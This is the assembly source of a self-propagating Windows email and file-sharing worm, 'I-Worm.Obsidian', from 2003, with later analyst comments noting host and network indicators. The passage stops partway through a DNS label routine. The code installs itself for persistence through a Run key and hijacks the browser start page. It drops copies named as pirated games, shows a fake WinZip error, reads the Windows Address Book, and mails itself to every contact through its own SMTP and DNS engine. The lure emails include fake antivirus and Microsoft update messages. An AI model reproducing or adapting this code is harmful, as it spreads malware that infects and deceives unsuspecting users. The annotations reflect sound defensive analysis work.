文章作者:Vorgon/iKX
;---------------------------------------------------------------------------;
; Name: I-Worm.Obsidian@mm ;
; Author: Vorgon ;
; Size: 20480 Bytes ;
; Date: Thursday, April 10, 2003 ;
; ;
; Made in Canada ;
;---------------------------------------------------------------------------;
; ;
; DESCRIPTION: ;
; ;
; This is my first worm. It spreads using file sharing and email. When the ;
; worm is executed it copies itself to the c:\windows directory. It then ;
; adds itself to the registry so it runs on start-up. The internet explorer ;
; start page is then changed to www.dxgaming.com. A game is then created in ;
; the c:\my downloads directory if one does not already exist. The game to ;
; be created is based on the hour giving a possible 24 games. If the worm ;
; is executed on start-up then it stays active. Every hour it will send ;
; infected emails to everyone in the windows address book. A different ;
; email is sent for every day of the week using my own SMTP engine. ;
; ; ;
; ASSEMBLING: ;
; ;
; tasm32 /ml obsidian ;
; tlink32 -aa -x /Tpe /c obsidian,obsidian,, import32.lib,, ;
; ;
; GREETZ: ;
; ;
; T00FiC, Eddow, Asmodeus, SPTH, PakBrain, Kefi and the many people i ;
; forgot. ;
; ;
;---------------------------------------------------------------------------;
.386p
.MODEL flat, stdcall
extrn MessageBoxA : PROC
extrn GetCommandLineA : PROC
extrn CreateFileA : PROC
extrn ReadFile : PROC
extrn WriteFile : PROC
extrn SetFilePointer : PROC
extrn CloseHandle : PROC
extrn SetCurrentDirectoryA : PROC
extrn ExitProcess : PROC
extrn RegOpenKeyA : PROC
extrn RegSetvalueExA : PROC
extrn RegQueryvalueExA : PROC
extrn RegCloseKey : PROC
extrn GetSystemTime : PROC
extrn FindFirstFileA : PROC
extrn FindNextFileA : PROC
extrn FindClose : PROC
extrn Sleep : PROC
extrn lstrcpyA : PROC
extrn lstrcatA : PROC
extrn lstrlenA : PROC
extrn WSAStartup : PROC
extrn WSACleanup : PROC
extrn socket : PROC
extrn closesocket : PROC
extrn htons : PROC
extrn gethostbyname : PROC
extrn connect : PROC
extrn recv : PROC
extrn send : PROC
extrn recvfrom : PROC
extrn sendto : PROC
extrn RtlZeroMemory : PROC
extrn setsockopt : PROC
OPEN_EXISTING equ 3
CREATE_NEW equ 1
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
FILE_SHARE_READ equ 1
FILE_SHARE_WRITE equ 2
FILE_BEGIN equ 0
HKEY_LOCAL_MACHINE equ 80000002h
HKEY_CURRENT_USER equ 80000001h
REG_SZ equ 1
TRUE equ 1
FALSE equ 0
AF_INET equ 2
SOCK_STREAM equ 1
SOCK_DGRAM equ 2
PCL_NONE equ 0
DNS_TYPE_MX equ 15
DNS_TYPE_NS equ 2
DNS_CLASS_IN equ 1
SO_RCVTIMEO equ 1006h
SO_SNDTIMEO equ 1005h
SOL_SOCKET equ 0FFFFh
; SOFTWARE record: 50-byte file name followed by a 4-byte size, 54 bytes in
; total. CreateSoftware indexes softwareTable with this record size (54) and
; reads the size field at offset 50.
SOFTWARE STRUC
FileName db 50 dup(0)
FileSize dd 0
SOFTWARE ENDS
; EMAIL record: 50 + 50 + 100 + 20 = 220 bytes. MassMail indexes emailTable
; with this record size (220) and reads the fields at offsets 0 (From),
; 50 (Subject), 100 (Message) and 200 (AttachmentName).
EMAIL STRUC
From db 50 dup(0)
Subject db 50 dup(0)
Message db 100 dup(0)
AttachmentName db 20 dup(0)
EMAIL ENDS
SYSTEMTIME STRUCT
wYear dw 0
wMonth dw 0
wDayOfWeek dw 0
wDay dw 0
wHour dw 0
wMinute dw 0
wSecond dw 0
wMiliseconds dw 0
SYSTEMTIME ENDS
WIN32_FIND_DATA STRUCT
FileAttributes dd 0
CreateTime dq 0
LastAccessTime dq 0
LastWriteTime dq 0
FileSizeHigh dd 0
FileSizeLow dd 0
Reserved0 dd 0
Reserved1 dd 0
FullFileName db 260 dup(0)
AlternateFileName db 14 dup(0)
WIN32_FIND_DATA ENDS
WSA_DATA STRUC
wVersion dw 0
wHighVersion dw 0
szDescription db 257 dup(0)
szSystemStatus db 129 dup(0)
iMaxSockets dw 0
iMaxUdpDg dw 0
lpVendorInfo dd 0
WSA_DATA ENDS
SOCK_ADDRESS STRUC
sin_family dw 0
sin_port dw 0
sin_addr dd 0
sin_zero db 8 dup(0)
SOCK_ADDRESS ENDS
.DATA
time SYSTEMTIME 〈0〉
win32_find_data WIN32_FIND_DATA 〈0〉
WSAData WSA_DATA 〈0〉
SockAddress SOCK_ADDRESS 〈0〉
; Decoy dialog text: Main shows this message box when the program is started
; without the -A switch, then exits.
szErrorTitle db 'WinZip Self-Extractor', 0
szErrorMessage db 'WinZip Self-Extractor header corrupt. Possible cause: bad disk or file transfer error', 0
; Host-based indicators used by Main: the path the image is copied to, the
; Internet Explorer start-page value it overwrites (opened under
; HKEY_CURRENT_USER), and the Run-key value it writes (opened under
; HKEY_LOCAL_MACHINE, value name 'PC-Config32', command line ending in -A).
szMaster db 'c:\WINDOWS\pcconfig.exe', 0
szStartPageKey db 'Software\Microsoft\Internet Explorer\Main', 0
szStartPageName db 'Start Page', 0
; NOTE(review): the [url]...[/url] wrapper looks like forum markup added when
; this listing was posted; confirm against a sample before using the string
; as an indicator.
szStartPagevalue db '[url]http://www.dxgaming.com[/url]', 0
szStartUpKey db 'Software\Microsoft\Windows\CurrentVersion\Run', 0
szStartUpName db 'PC-Config32', 0
szStartUpvalue db 'C:\WINDOWS\pcconfig.exe -A', 0
; Registry key MassMail opens under HKEY_CURRENT_USER and queries with a null
; value name to obtain the path of the Windows Address Book file; the result
; is stored in szWabvalue (bufferSize is 256).
szWabKey db 'Software\Microsoft\WAB\WAB4\Wab File Name', 0
szWabvalue db 256 dup(0)
; Directory the decoy copy is written to (CreateSoftware) and the pattern
; CheckDirectory enumerates to see whether a copy is already present.
szMyDownloads db 'c:\my downloads', 0
szSearchString db 'c:\my downloads\*.exe', 0
hFile dd 0
hKey dd 0
hFindFile dd 0
hSock dd 0
parameterA db FALSE
emailMessage db 4096 dup(0)
recordPosition dd 0
dataType dd 0
bufferSize dd 256
numberOfEmails dd 0
pointerToEmails dd 0
numberOfBytes dd 0
emailAddressUNI db 68 dup(0)
emailAddressASC db 34 dup(0)
; Literal SMTP commands sent by MassMail. The greeting is constant for every
; session, which makes it usable as a network signature.
helo db 'HELO vorgon.com', 13, 10
szMailFrom db 'MAIL FROM: 〈', 0
szMailTo db 'RCPT TO: 〈', 0
sendData db 'DATA', 13, 10
dot db 13, 10, '.', 13, 10
endMail db 'QUIT', 13, 10
; 100-byte scratch buffer: receives server replies and is reused to build the
; MAIL FROM / RCPT TO lines.
sendBuffer db 100 dup(0)
szBracket db '〉', 13, 10, 0
szCrLf db 13, 10, 0
; Hard-coded address that GetSmtpDomain contacts on port 53 (SOCK_DGRAM) for
; its first (NS) query. Outbound DNS from a workstation to this address,
; bypassing the configured resolver, is a network indicator.
szDnsName db '199.166.6.2', 0
; No reference to szFile is visible in this listing.
szFile db 'results.bin', 0
szQuery db 100 dup(0)
szQuery2 db 100 dup(0)
szQueryLabels db 100 dup(0)
szSMTP db 100 dup(0)
IOTimeOut dd 0
dnsBuffer db 1000 dup(0)
bytes4 db 4 dup(0)
; template for an email message with file attachment
emailP1 db 'MIME-Version: 1.0', 13, 10
db 'From: 〈', 0
emailP2 db '〉', 13, 10
db 'To: 〈', 0
emailP3 db '〉', 13, 10
db 'Subject: ', 0
emailP4 db 13, 10
db 'Content-Type: multipart/mixed; boundary=boundarystring', 13, 10, 13, 10
db 'This is a mulipart message in MIME format.', 13, 10
db '--boundarystring', 13, 10
db 'Content-Type: text/plain', 13, 10, 13, 10, 0
emailP5 db 13, 10
db '--boundarystring', 13, 10
db 'Content-Type: application; name="default.exe"', 13, 10
db 'Content-Transfer-Encoding: base64', 13, 10
db 'Content-Disposition: attachment; filename="', 0
emailP6 db '"', 13, 10, 13, 10, 0
emailP7 db 13, 10, '--boundarystring--', 13, 10, 0
; Decoy file names and sizes used by CreateSoftware (24 records, selected by
; index). Every size value ends in the byte 13h; CheckDirectory treats any
; .exe in c:\my downloads whose low size byte is 13h as an existing copy, so
; that byte is the marker. The names double as file-name indicators.
softwareTable:
SOFTWARE 〈"Cossacks Full Version.exe", 0A87EC13h〉
SOFTWARE 〈"Battlefield 1942 (full).exe", 0C499913h〉
SOFTWARE 〈"Warcraft III Full.exe", 09994613h〉
SOFTWARE 〈"Jedi Knight II.exe", 0A706C13h〉
SOFTWARE 〈"Quake 3 Full Version.exe", 099C7A13h〉
SOFTWARE 〈"Starcraft full.exe", 07C83013h〉
SOFTWARE 〈"Doom 3.exe", 13D58313h〉
SOFTWARE 〈"Tribes 2 (full).exe", 104C3513h〉
SOFTWARE 〈"Rainbow 6 Full.exe", 07B8ED13h〉
SOFTWARE 〈"Oni full.exe", 0A66A813h〉
SOFTWARE 〈"White and Black.exe", 0999BB13h〉
SOFTWARE 〈"Return to Castle Wolfenstien (Full).exe", 277C5613h〉
SOFTWARE 〈"Command & Conquer: Generals.exe", 28F8BD13h〉
SOFTWARE 〈"Black Hawk Down (full).exe", 048E1313h〉
SOFTWARE 〈"The Sims: Unleashed.exe", 0A168C13h〉
SOFTWARE 〈"Age Of Mythology.exe", 165D8E13h〉
SOFTWARE 〈"Dark Age of Camelot.exe", 19775113h〉
SOFTWARE 〈"Ultima Online.exe", 1F316113h〉
SOFTWARE 〈"The Lord of the Rings.exe", 0C147F13h〉
SOFTWARE 〈"Medel Of Honor: Allied Assault.exe", 0C147F13h〉
SOFTWARE 〈"Grand Theft Auto 3 (full).exe", 08E07D13h〉
SOFTWARE 〈"Unreal 2: The Awakening (full).exe", 16A71A13h〉
SOFTWARE 〈"Unreal.exe", 0ABA1F13h〉
SOFTWARE 〈"Master Of Orion 3.exe", 03046613h〉
; Seven hard-coded lure messages (sender, subject, body text, attachment
; name). MassMail picks one record using the value the caller passes in eax
; (Main passes time.wDayOfWeek). The sender is taken from this table, not
; from the infected machine. Subjects and attachment names are usable as
; mail-filter indicators.
; NOTE(review): the [email]...[/email] wrappers look like forum markup added
; when this listing was posted; confirm against a sample.
emailTable:
EMAIL 〈"[email]alex_p@hotmail.com[/email]",\
"So much fun",\
"This game really rocks. Play it!",\
"roadrash.exe"〉
EMAIL 〈"[email]nicolas_k@kingsnake.com[/email]",\
"I need help",\
"This game wont run properly. Does it work for you?",\
"kungfoo2.exe"〉
EMAIL 〈"[email]james_c@norton.com[/email]",\
"Virus Alert!",\
"Win32.Kiss0Death is spreading fast. Download the protection.",\
"protect.exe"〉
EMAIL 〈"[email]joice_z@cooking.com[/email]",\
"Taisty eh?",\
"Tell me if this makes your mouth water.",\
"yummy.exe"〉
EMAIL 〈"[email]momoney@cibc.com[/email]",\
"Free money",\
"Run this program and you will recieve 10 dollars a week free.",\
"money.exe"〉
EMAIL 〈"[email]msn@microsoft.com[/email]",\
"MSN Messenger Update",\
"Latest update for MSN Messenger.",\
"messenger.exe"〉
EMAIL 〈"[email]stopspam@spammers.com[/email]",\
"SPAM protection",\
"Run the program below and you will never see spam mail again.",\
"nospam.exe"〉
.DATA?
buffer db 20480 dup(?)
.CODE
; Entry point. Sequence visible below: look for a -A switch on the command
; line, copy the running image to szMaster, write the Run-key value, set the
; Internet Explorer start page, drop one decoy-named copy in c:\my downloads,
; then either show a fake WinZip error and exit (no -A) or stay resident and
; call MassMail once an hour (-A, which is how the Run-key entry starts it).
; Host artifacts for triage: c:\WINDOWS\pcconfig.exe, the 'PC-Config32' value
; under ...\CurrentVersion\Run, the changed 'Start Page' value, and an .exe in
; c:\my downloads whose size ends in the byte 13h.
Main:
;----------------------------------------------------------------------------
; Search the command line for -A
;----------------------------------------------------------------------------
call GetCommandLineA ; Get the command line
; search for a quote
; 34 is the ASCII double quote; the scan starts at offset 1, so it looks for
; the quote that closes the program path.
mov ecx, 0
findParam:
inc ecx
cmp byte ptr [eax+ecx], 34
jne findParam
mov byte ptr [eax+ecx], 0 ; remove end quote
inc eax ; skip past the first quote
; eax now points at the unquoted program path; the two bytes after the
; closing quote and one separator are compared with "-A".
cmp word ptr [eax+ecx+1], 'A-' ; -A ?
jne copyFile
mov parameterA, TRUE
;----------------------------------------------------------------------------
; Copy self to the c:\windows directory as pcconfig.exe
;----------------------------------------------------------------------------
copyfile:
; open the current program file
call CreateFileA, eax, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0
mov hFile, eax
cmp eax, -1
je addToReg
; Read the program into memory
; A fixed 20480 bytes are read into buffer; the same buffer is later written
; out by CreateSoftware and base64-encoded by MassMail.
call ReadFile, hFile, offset buffer, 20480, offset numberOfBytes, 0
;close file
call CloseHandle, hFile
; create\open c:\windows\pcconfig.exe
; CREATE_NEW fails when the file already exists, in which case the copy step
; is skipped and execution continues at addToReg.
call CreateFileA, offset szMaster, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_NEW, 0, 0
mov hFile, eax
cmp eax, -1
je addToReg
; write the program in the buffer to the file
call WriteFile, hFile, offset buffer, 20480, offset numberOfBytes, 0
; close file
call CloseHandle, hFile
;----------------------------------------------------------------------------
; Add pcconfig.exe to the registry so the program runs on start-up
;----------------------------------------------------------------------------
addToReg:
call RegOpenKeyA, HKEY_LOCAL_MACHINE, offset szStartUpKey, offset hKey
cmp eax, 0
jne setStartPage
; create a value
call RegSetvalueExA, hKey, offset szStartUpName, 0, REG_SZ, offset szStartUpvalue, 0
; close key
call RegCloseKey, hKey
;----------------------------------------------------------------------------
; Change the internet explorer start page
;----------------------------------------------------------------------------
setStartPage:
call RegOpenKeyA, HKEY_CURRENT_USER, offset szStartPageKey, offset hKey
cmp eax, 0
; if the key cannot be opened, the decoy-file step below is skipped as well
jne endProgram
; create a value
call RegSetvalueExA, hKey, offset szStartPageName, 0, REG_SZ, offset szStartPagevalue, 0
; close key
call RegCloseKey, hKey
;----------------------------------------------------------------------------
; Create a game in the c:\my downloads directory
;----------------------------------------------------------------------------
createGame:
call CheckDirectory ; check to see if bogus software already exists
cmp eax, -1
je endProgram
xor eax, eax
; NOTE(review): GetSystemTime is first called at remainActive below, so on
; this path time.wHour still holds the value the structure was initialised
; with in .DATA -- confirm which table entry is actually used on a sample.
mov ax, time.wHour
call CreateSoftware, eax ; Select a game to create based on the hour
;----------------------------------------------------------------------------
; Main
;----------------------------------------------------------------------------
endProgram:
cmp parameterA, TRUE
je remainActive
; display a bogus error message and exit if no -A parameter was found
; 16 is the message-box style value for the error (stop) icon
call MessageBoxA, 0, offset szErrorMessage, offset szErrorTitle, 16
call ExitProcess, 0
; Resident loop: polls the clock every 100 ms and calls MassMail when
; wMinute == 1 and wSecond == 1 (GetSystemTime reports UTC).
remainActive:
call Sleep, 100 ; free up the processor time
call GetSystemTime, offset time ; get the system time
cmp time.wMinute, 1 ; try mass mailing every hour
jne remainActive
cmp time.wSecond, 1
jne remainActive
xor eax, eax
; MassMail takes the day of the week in eax rather than on the stack
mov ax, time.wDayOfWeek
call MassMail ; select an email message to send based on the day of the week
jmp remainActive
;----------------------------------------------------------------------------
; Functions
;----------------------------------------------------------------------------
; CheckDirectory
; In:  nothing (uses szSearchString, win32_find_data, hFindFile)
; Out: eax = -1 if a marked file is present, 0 otherwise
; A file counts as "already created" when the low byte of its size is 13h,
; which is the final byte of every FileSize value in softwareTable. The same
; test can be used to spot dropped copies in c:\my downloads.
CheckDirectory PROC
;
; This function searches the c:\my downloads directory for any
; software that has already been created.
;
call FindFirstFileA, offset szSearchString, offset win32_find_data
mov hFindFile, eax
; the FindFirstFileA result is not tested before the first size comparison
searchFiles:
mov eax, win32_find_data.FileSizeLow
cmp al, 13h ; size marker byte
je fileFound
call FindNextFileA, hFindFile, offset win32_find_data
cmp eax, 0 ; no more exe files left?
jne searchFiles
call FindClose, hFindFile
xor eax, eax ; nothing marked was found
ret
fileFound:
call FindClose, hFindFile
mov eax, -1 ; a marked file exists
ret
CheckDirectory ENDP
; CreateSoftware
; In:  softwareID = index into softwareTable (54-byte SOFTWARE records)
; Out: eax = 0 on success, -1 if the file could not be created
; Writes the 20480-byte image held in buffer under the decoy name from the
; selected record, then extends the file to the record's FileSize by writing
; one byte at offset FileSize - 1. The result is a file whose real content is
; the first 20480 bytes; the declared sizes in the table are far larger, so a
; large .exe in c:\my downloads with only 20480 bytes of content matches.
; Uses the globals recordPosition, hFile and numberOfBytes; ebx and edx are
; overwritten.
CreateSoftware PROC softwareID:DWORD
;
; This function creates a copy of this virus in the c:\my downloads
; folder and disguises it as a piece of valid software like a
; computer game.
;
; the record's file name is passed to CreateFileA without a path, so the file
; is created relative to this directory
call SetCurrentDirectoryA, offset szMyDownloads
; get the address of the software record specified in softwareID
xor edx, edx
mov eax, softwareID
mov ebx, 54 ; record size
mul ebx
add eax, offset softwareTable
mov recordPosition, eax
; create the software in the c:\my downloads folder
; FileName is the first field, so the record address is also the name pointer
call CreateFileA, eax, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_NEW, 0, 0
mov hFile, eax
cmp eax, -1
je createFailure
; write program to file
call WriteFile, hFile, offset buffer, 20480, offset numberOfBytes, 0
; Set the filesize
mov eax, [recordPosition]
add eax, 50 ; offset of FileSize within the record
mov eax, [eax]
dec eax ; eax = filesize - 1
call SetFilePointer, hFile, eax, 0, FILE_BEGIN
; one byte written at FileSize - 1 makes the file exactly FileSize bytes long
call WriteFile, hFile, offset buffer, 1, offset numberOfBytes, 0
; close file
call CloseHandle, hFile
xor eax, eax
ret
createFailure:
mov eax, -1
ret
CreateSoftware ENDP
; MassMail
; In:  eax = index into emailTable (the caller passes time.wDayOfWeek);
;      there are no stack parameters
; Out: none
; For every address record read from the Windows Address Book file it builds
; one MIME message from the selected emailTable record, looks up a mail
; server for the recipient's domain (GetSmtpDomain, up to 3 attempts),
; connects to it on port 25 and sends the message with the image in buffer
; attached.
; Network-side characteristics visible in this routine:
;   - SMTP sessions go from the host directly to recipient mail servers
;   - the greeting is always the `helo` string and the sender comes from
;     emailTable
;   - the MIME boundary is the constant 'boundarystring' and the attachment
;     part always carries name="default.exe"
;   - the base64 attachment is sent as 4-byte pieces with no line breaks
;   - server replies are read into sendBuffer but never examined
; NOTE(review): the WAB offsets used below (60h, 64h, 68-byte records) are
; taken as found here; the file format is not described in this listing.
MassMail PROC
;
; This function sends an email with the worm attachment to everyone
; in the windows address book.
;
; get the record position
xor edx, edx
mov ebx, 220 ; record size
mul ebx ; eax (caller-supplied index) * 220
add eax, offset emailTable
mov recordPosition, eax
; get the path of the system WAB file
; return codes of the three registry calls are not checked; a failure shows
; up as CreateFileA failing on an empty szWabvalue
call RegOpenKeyA, HKEY_CURRENT_USER, offset szWabKey, offset hKey
call RegQueryvalueExA, hKey, 0, 0, offset dataType, offset szWabvalue, offset bufferSize
call RegCloseKey, hKey
; open the WAB file
call CreateFileA, offset szWabvalue, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0
mov hFile, eax
cmp eax, -1
je cleanUp
; get the number of email addresses
call SetFilePointer, hFile, 64h, 0, FILE_BEGIN
call ReadFile, hFile, offset numberOfEmails, 4, offset numberOfBytes, 0
cmp numberOfEmails, 0
je cleanUp
; get the pointer to the email table
call SetFilePointer, hFile, 60h, 0, FILE_BEGIN
call ReadFile, hFile, offset pointerToEmails, 4, offset numberOfBytes, 0
; seek to the email table
call SetFilePointer, hFile, pointerToEmails, 0, FILE_BEGIN
; initialize winsock
call WSAStartup, 0101h, offset WSAData
cmp eax, 0
jne cleanUp
sendEmail:
; get an email address in its UNICODE format
call ReadFile, hFile, offset emailAddressUNI, 68, offset numberOfBytes, 0
; convert the email address to ASCII
call ConvertUniToAsc, offset emailAddressUNI, offset emailAddressASC
; get the domain name from the meail message
mov eax, offset emailAddressASC
; scans forward from the second byte until an '@' is found
findAt:
inc eax
cmp byte ptr [eax], '@'
jne findAt
inc eax
; szQuery = domain part of the recipient address, used by GetSmtpDomain
call lstrcpyA, offset szQuery, eax
; create the email message
; emailMessage is zeroed at the end of each pass, so lstrcatA starts from an
; empty string here
call lstrcatA, offset emailMessage, offset emailP1
;append FROM email address
call lstrcatA, offset emailMessage, dword ptr [recordPosition]
call lstrcatA, offset emailMessage, offset emailP2
; append TO email address
call lstrcatA, offset emailMessage, offset emailAddressASC
call lstrcatA, offset emailMessage, offset emailP3
; append subject
mov eax, [recordPosition]
add eax, 50 ; EMAIL.Subject
call lstrcatA, offset emailMessage, eax
call lstrcatA, offset emailMessage, offset emailP4
; append message
mov eax, [recordPosition]
add eax, 100 ; EMAIL.Message
call lstrcatA, offset emailMessage, eax
call lstrcatA, offset emailMessage, offset emailP5
; append filename
mov eax, [recordPosition]
add eax, 200 ; EMAIL.AttachmentName
call lstrcatA, offset emailMessage, eax
call lstrcatA, offset emailMessage, offset emailP6
; get the smtp server name
mov ecx, 3 ; at most three lookup attempts per recipient
findSmtp:
push ecx
call GetSmtpDomain
pop ecx
cmp eax, 0
je foundSmtp
dec ecx
cmp ecx, 0
jne findSmtp
jmp abortSend
foundSmtp:
; connect to the email server
; the ConnectToHost result is not checked before the dialogue starts
call ConnectToHost, offset hSock, offset szSMTP, 25, SOCK_STREAM
call TimeOut, hSock, 5000 ; 5000 ms send/receive timeout
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the HELO command
; 17 = length of 'HELO vorgon.com' plus CR LF
call send, hSock, offset helo, 17, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
call RtlZeroMemory, offset sendBuffer, 100
; send the MAIL FROM command
call lstrcatA, offset sendBuffer, offset szMailFrom
call lstrcatA, offset sendBuffer, dword ptr [recordPosition]
call lstrcatA, offset sendBuffer, offset szBracket
call lstrlenA, offset sendBuffer
call send, hSock, offset sendBuffer, eax, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
call RtlZeroMemory, offset sendBuffer, 100
; send the RCPT TO command
call lstrcatA, offset sendBuffer, offset szMailTo
call lstrcatA, offset sendBuffer, offset emailAddressASC
call lstrcatA, offset sendBuffer, offset szBracket
call lstrlenA, offset sendBuffer
call send, hSock, offset sendBuffer, eax, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the DATA command
call send, hSock, offset sendData, 6, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the message data
call lstrlenA, offset emailMessage
call send, hSock, offset emailMessage, eax, 0
; attach the worm to the email message
; 6827 groups of 3 bytes = 20481 bytes read starting at buffer (buffer is
; declared as 20480 bytes); each group is sent as 4 base64 characters, giving
; a 27308-character body with no CR LF inside it
mov esi, offset buffer
mov ecx, 6827
attachWorm:
pusha
call Base64Encode, esi, offset bytes4
call send, hSock, offset bytes4, 4, 0
popa
add esi, 3
dec ecx
cmp ecx, 0
jne attachWorm
; 22 = length of CR LF '--boundarystring--' CR LF
call send, hSock, offset emailP7, 22, 0
; send the . command
call send, hSock, offset dot, 5, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the QUIT command
call send, hSock, offset endMail, 6, 0
abortSend:
call closesocket, hSock
; clear some buffers
call RtlZeroMemory, offset emailMessage, 4096
call RtlZeroMemory, offset sendBuffer, 100
call RtlZeroMemory, offset szQuery, 100
call RtlZeroMemory, offset szQuery2, 100
call RtlZeroMemory, offset szQueryLabels, 100
call RtlZeroMemory, offset szSMTP, 100
call RtlZeroMemory, offset dnsBuffer, 1000
call RtlZeroMemory, offset emailAddressASC, 34
call RtlZeroMemory, offset emailAddressUNI, 68
; one address-book record handled; loop until the count read from the file
; reaches zero
dec numberOfEmails
cmp numberOfEmails, 0
jne sendEmail
cleanUp:
call WSACleanup
call CloseHandle, hFile
ret
MassMail ENDP
; ConvertUniToAsc
; In:  uniString = address of a string of 16-bit characters ended by a zero
;      word; ascString = address of the destination byte buffer
; Out: none; esi, edi and al are overwritten
; Copies the low byte of each 16-bit character. At least one character is
; copied before the terminator test, and no terminating zero is written, so
; the destination must already be zero-filled (MassMail clears
; emailAddressASC after each recipient).
ConvertUniToAsc PROC uniString:DWORD, ascString:DWORD
;
; This routine converts a zero terminated UNICODE string to an
; ASCII string.
;
mov esi, uniString
mov edi, ascString
convertAsc:
mov al, byte ptr [esi] ; low byte of the current 16-bit character
mov byte ptr [edi], al
add esi, 2
inc edi
cmp word ptr [esi], 0 ; stop at the zero word
jne convertAsc
ret
ConvertUniToAsc ENDP
; GetSmtpDomain
; In:  szQuery = recipient domain (filled in by MassMail)
; Out: eax = 0 with the mail server name in szSMTP, or -1 on failure
; Two DNS exchanges over SOCK_DGRAM on port 53:
;   1. an NS query for szQuery sent to the hard-coded address in szDnsName;
;      a name taken from the reply is stored in szQuery2
;   2. an MX query for szQuery sent to the host named in szQuery2; a name
;      taken from that reply is stored in szSMTP
; Both queries are built by QueryDNS, so they share its fixed query ID and
; fixed 100-byte datagram length.
; NOTE(review): the reply is parsed at fixed offsets (name length + 30 and
; + 32 from the start of dnsBuffer); this presumably assumes a particular
; reply layout -- confirm against captured traffic.
GetSmtpDomain PROC
;
; This functions gets the domain name of a smtp server
;
; connect to the DNS server
call ConnectToHost, offset hSock, offset szDnsName, 53, SOCK_DGRAM
cmp eax, -1
je smtpFailure
call TimeOut, hSock, 5000
call StringToLabels, offset szQuery, offset szQueryLabels
call QueryDNS, hSock, offset dnsBuffer, 1000, offset szQueryLabels, DNS_TYPE_NS, DNS_CLASS_IN
cmp eax, -1
je smtpFailure
call closesocket, hSock
; locate a name in the NS reply at dnsBuffer + strlen(szQuery) + 30
call lstrlenA, offset szQuery
mov edi, offset dnsBuffer
add edi, eax
add edi, 30
call GetDomainName, offset dnsBuffer, edi, offset szQuery2
call RtlZeroMemory, offset dnsBuffer, 1000
call RtlZeroMemory, offset szQueryLabels, 100
; second exchange goes to the server named in szQuery2
call ConnectToHost, offset hSock, offset szQuery2, 53, SOCK_DGRAM
cmp eax, -1
je smtpFailure
call TimeOut, hSock, 5000
; convert the domain name to labels
call StringToLabels, offset szQuery, offset szQueryLabels
; query the DNS server for a list of MX(mail exchage) records
call QueryDNS, hSock, offset dnsBuffer, 1000, offset szQueryLabels, DNS_TYPE_MX, DNS_CLASS_IN
cmp eax, -1
je smtpFailure
; terminate connection
call closesocket, hSock
; get the first email server name in the message
; located at dnsBuffer + strlen(szQuery) + 32
call lstrlenA, offset szQuery
mov edi, offset dnsBuffer
add edi, eax
add edi, 32
call GetDomainName, offset dnsBuffer, edi, offset szSMTP
xor eax, eax
ret
smtpFailure:
call closesocket, hSock
mov eax, -1
ret
GetSmtpDomain ENDP
; GetDomainName
; In:  buf    = start of the DNS message (base for compression pointers)
;      source = address of the first length byte of the name to decode
;      dest   = buffer that receives the dotted name
; Out: eax = 0; esi, edi, cl and al are overwritten
; Decodes length-prefixed DNS labels into text, inserting '.' between labels.
; A length byte of -64 (0C0h) is treated as a compression pointer; only the
; byte that follows it is used as the offset into buf. No terminating zero is
; written and no lengths are checked against the size of either buffer, so
; the output depends on dest being zero-filled beforehand.
GetDomainName PROC buf:DWORD, source:DWORD, dest:DWORD
;
; This function retrieves a domain name from a query message
;
mov esi, source
mov edi, dest
mov cl, [esi] ; cl = length of the first label
copyLabel:
inc esi
mov al, [esi]
mov [edi], al
inc edi
dec cl
cmp cl, 0
jne copyLabel
inc esi ; esi -> next length byte
cmp byte ptr [esi], -64 ; 0C0h: compression pointer
je appendLabel
cmp byte ptr [esi], 0 ; zero length ends the name
je domainComplete
mov cl, [esi]
mov byte ptr [edi], '.'
inc edi
jmp copyLabel
domainComplete:
xor eax, eax
ret
appendLabel:
; continue decoding at buf + (byte following the 0C0h marker)
xor eax, eax
mov al, [esi+1]
add eax, buf
mov esi, eax
mov cl, [esi]
mov byte ptr [edi], '.'
inc edi
jmp copyLabel
GetDomainName ENDP
; QueryDNS
; In:  sock  = connected datagram socket
;      buf   = buffer used for both the query and the reply
;      size  = number of bytes to accept in the reply
;      name  = query name already converted to labels (see StringToLabels)
;      type, class = DNS query type and class
; Out: eax = 0 if a reply with a non-zero answer count was received,
;      -1 otherwise
; Traffic characteristics fixed by this routine: query ID 3, flags 0,
; one question, and a datagram length of 100 bytes regardless of the name.
QueryDNS PROC sock:DWORD, buf:DWORD, size:DWORD, name:DWORD, type:WORD, class:WORD
;
; This function queries a DNS server
;
; Create the query header
; NOTE(review): this loads `offset buf`, while the rest of the routine uses
; the value of buf; confirm which address the header words are written to.
mov edi, offset buf
call htons, 3
mov word ptr [edi], ax ; query ID
mov word ptr [edi+2], 0 ; flags
call htons, 1
mov word ptr [edi+4], ax ; question entries
mov word ptr [edi+6], 0 ; answer entries
mov word ptr [edi+8], 0 ; authority entries
mov word ptr [edi+10], 0 ; resource entries
; copy domain name to the buffer
; the question section starts right after the 12-byte header
mov eax, buf
add eax, 12
call lstrcpyA, eax, name
; seek past the domain name
; 13 = 12-byte header + the zero byte that ends the name
call lstrlenA, name
mov edi, buf
add edi, eax
add edi, 13
; write the query type
call htons, type
mov [edi], ax
; write the query class
call htons, class
mov [edi+2], ax
; send the query message to the DNS server
call sendto, [sock], buf, 100, 0, 0, 0
cmp eax, -1
je queryFailure
; recieve the query response
call recvfrom, [sock], buf, size, 0, 0, 0
cmp eax, -1
je queryFailure
; check to see if the query got an answer
; offset 6 is the answer-count field of the reply header
mov edi, buf
cmp word ptr [edi+6], 0
je queryFailure
xor eax, eax
ret
queryFailure:
mov eax, -1
ret
QueryDNS ENDP
; StringToLabels
; In:  source = zero-terminated dotted name
;      dest   = buffer that receives the length-prefixed labels
; Out: none; esi, edi, edx, cl and al are overwritten
; Each label is written after a one-byte slot; when a '.' or the end of the
; string is reached, the count of bytes copied is stored into that slot.
; edx always points at the slot of the label being copied. The output ends
; with a zero byte. No length limits are enforced.
StringToLabels PROC source:DWORD, dest:DWORD
;
; This function converts a zero terminated domain name into
; a series of labels that the DNS server understands
;
mov esi, source
mov edi, dest
inc edi ; leave room for the first length byte
